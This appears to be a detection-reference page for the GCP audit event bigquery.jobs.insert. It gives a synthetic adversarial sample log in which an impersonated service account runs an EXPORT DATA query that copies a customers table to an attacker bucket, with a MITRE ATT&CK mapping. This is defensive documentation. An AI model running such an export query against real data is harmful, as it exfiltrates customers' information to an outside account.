bigquery.jobs.insert
GCP
bigquery.jobs.insert
Event
Creates and submits a BigQuery job (query, load, export, or copy) that accesses or transforms data in BigQuery datasets.
Security Context
- Accessing cloud storage objects can expose sensitive data including backups, configuration files, application data, and customer information.
- Transferring data to external cloud accounts or regions can bypass network-based data loss prevention controls and exfiltrate large volumes of data.
Log Source
Cloud Audit Logs
Sample Event
Adversarial. Draco — having pivoted via an impersonated occamy-pipeline@ token from the prior GenerateAccessToken event — submits an EXPORT DATA query against the fantasticlogs-prod:occamy_events.customers table, writing the result as Parquet to a Cloud Storage bucket in his external project (gs://draco-exfil-bucket-666/). This is the canonical T1530 + T1537 BigQuery exfil pattern.
{ "protoPayload": { "@type": "type.googleapis.com/google.cloud.audit.AuditLog", "status": {}, "authenticationInfo": { "principalEmail": "occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com", "principalSubject": "serviceAccount:occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com", "serviceAccountDelegationInfo": [ { "firstPartyPrincipal": { "principalEmail": "draco@fantasticlogs.cloud" } } ] }, "requestMetadata": { "callerIp": "203.0.113.66", "callerSuppliedUserAgent": "google-cloud-sdk gcloud/465.0.0 command/gcloud.alpha.bq.query invocation-id/90000000000000000000001111101000 environment/None environment-version/None client-os/LINUX client-os-ver/(5,15,0) client-pltf-arch/x86_64 interactive/False from-script/False python/3.11.6 term/xterm-256color (Linux 5.15.0-1052-aws),gzip(gfe)", "requestAttributes": { "time": "2026-04-15T17:02:11.123456789Z", "auth": {} }, "destinationAttributes": {} }, "serviceName": "bigquery.googleapis.com", "methodName": "google.cloud.bigquery.v2.JobService.InsertJob", "authorizationInfo": [ { "resource": "projects/fantasticlogs-prod", "permission": "bigquery.jobs.create", "granted": true, "resourceAttributes": {} }, { "resource": "projects/fantasticlogs-prod/datasets/occamy_events/tables/customers", "permission": "bigquery.tables.export", "granted": true, "resourceAttributes": {} } ], "resourceName": "projects/fantasticlogs-prod/jobs/bquxjob_occamy_001111101000", "metadata": { "@type": "type.googleapis.com/google.cloud.audit.BigQueryAuditMetadata", "jobChange": { "before": "PENDING", "after": "RUNNING", "job": { "jobName": "projects/fantasticlogs-prod/jobs/bquxjob_occamy_001111101000", "jobConfig": { "type": "QUERY", "queryConfig": { "query": "EXPORT DATA OPTIONS (uri = 'gs://draco-exfil-bucket-666/customers-*.parquet', format = 'PARQUET', overwrite = true) AS SELECT * FROM `fantasticlogs-prod.occamy_events.customers`", "queryPriority": "QUERY_INTERACTIVE", "statementType": "EXPORT_DATA" } }, "jobStatus": { "jobState": "RUNNING" }, "jobStats": { "createTime": "2026-04-15T17:02:11.050000000Z", "startTime": "2026-04-15T17:02:11.118000000Z", "parentJobName": "" } } } } }, "insertId": "evt001111101000", "resource": { "type": "bigquery_project", "labels": { "project_id": "fantasticlogs-prod", "location": "us-central1" } }, "timestamp": "2026-04-15T17:02:11.098765432Z", "severity": "INFO", "logName": "projects/fantasticlogs-prod/logs/cloudaudit.googleapis.com%2Fdata_access", "receiveTimestamp": "2026-04-15T17:02:11.456789012Z"}MITRE ATT&CK Mapping
Tactics: Collection Exfiltration
Techniques:
- T1530 — Data from Cloud Storage — Adversaries may access data from cloud storage.
- T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.